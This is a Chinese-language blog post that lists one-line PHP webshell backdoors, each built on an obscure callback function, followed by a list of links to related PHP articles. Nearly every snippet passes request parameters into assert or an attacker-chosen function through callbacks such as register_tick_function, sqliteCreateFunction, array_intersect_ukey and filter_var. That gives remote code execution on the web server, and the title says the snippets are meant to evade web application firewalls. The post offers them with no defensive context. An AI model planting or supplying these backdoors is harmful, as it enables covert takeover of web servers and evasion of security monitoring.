PHP后门之冷门回调函数(过waf)
PHP 函数 回调 后门 WAF
2023-09-14 08:56:56 时间
header_register_callback(create_function('','return assert($_POST[\'k\']);'));
$e = $_REQUEST['e']; declare(ticks=1); register_tick_function ($e, $_REQUEST['pass']);`
数据库回调后门
$e = $_REQUEST['e']; $db = new PDO('sqlite:sqlite.db3'); $db->sqliteCreateFunction('myfunc', $e, 1); $sth = $db->prepare("SELECT myfunc(:exec)"); $sth->execute(array(':exec' => $_REQUEST['pass'])); $e = $_REQUEST['e'];
register_shutdown_function($e, $_REQUEST['pass']);
mb_ereg_replace_callback('.+', create_function('$arr', 'return assert($arr[0]);'),$_REQUEST['pass']);
array_reduce(array($_POST['k']),create_function('$a,$b','return assert($b);'));
set_exception_handler(create_function('','return assert($_GET[k]);')); throw new exception();
class a { public function __construct($args) { forward_static_call('assert',$args); } } new a($_POST[k]);
iterator_apply(new arrayiterator(array($_GET['k'])),create_function('Iterator $i','assert($i->current());'),array(new arrayiterator(array($_GET['k']))));
array_intersect_ukey(array($_GET['k']=>'1'),array($_GET['k']=>'1'),'assert');
array_uintersect_uassoc(array($_GET[k]),array(''),'assert','strstr');
array_intersect_uassoc(array($_POST['k']=>''),array(''),'assert');
filter_var("phpinfo();" ,1024, array("options" => "assert"));
相关文章
- PHP面向对象06_异常处理
- PHP 5.4 已废弃 magic_quotes_gpc,PHP安全转义函数详解(addslashes 、htmlspecialchars、htmlentities、mysql_real_escape_string、strip_tags)
- PHP如何自动识别第三方Restful API的内容,自动渲染成 json、xml、html、serialize、csv、php等数据
- PHP函数 mysql_real_escape_string 与 addslashes 的区别
- PHP realpath() 函数
- PHP格式化金钱函数
- 检查PHP文件中是否含有bom的PHP函数
- PHP Socket编程 之 PHP的自带的三个压缩相关的函数:gzcompress、gzencode、gzdeflate
- QQ群免IDKEY加群PHP源码
- yii2定时任务不执行,报错PHP date调用警告:It is not safe to rely on the system's timezone settings
- PHP函数
- php分享十八:网页抓取
- 以源码编译的方式安装PHP与php-fpm
- 解决ZendStudio打开utf-8格式的php文件乱码
- php:用数组实现多语言(PHP 7.4.2)
- PHP md5() 函数
- PHP中private和public还有protected的区别
- [php-src]Php扩展的内存泄漏处理思路
- [PHP] 将回调函数作用到给定数组的单元上
- PHP发送邮件函数sendmail()
- Atitit. 二进制数据ascii表示法,与base64编码解码api 设计标准化总结java php c#.net
- PHP 5 Date/Time 函数
- PHP MySQL 读取数据
- PHP 零基础入门笔记(7):PHP 常用的系统函数
- PHP PDO函数库具体解释
- 如何判断你的 PHP 环境是 32 位还是 64 位?
- 4种PHP回调函数风格
- 【整理】Linux下中文检索引擎coreseek4安装,以及PHP使用sphinx的三种方式(sphinxapi,sphinx的php扩展,SphinxSe作为mysql存储引擎)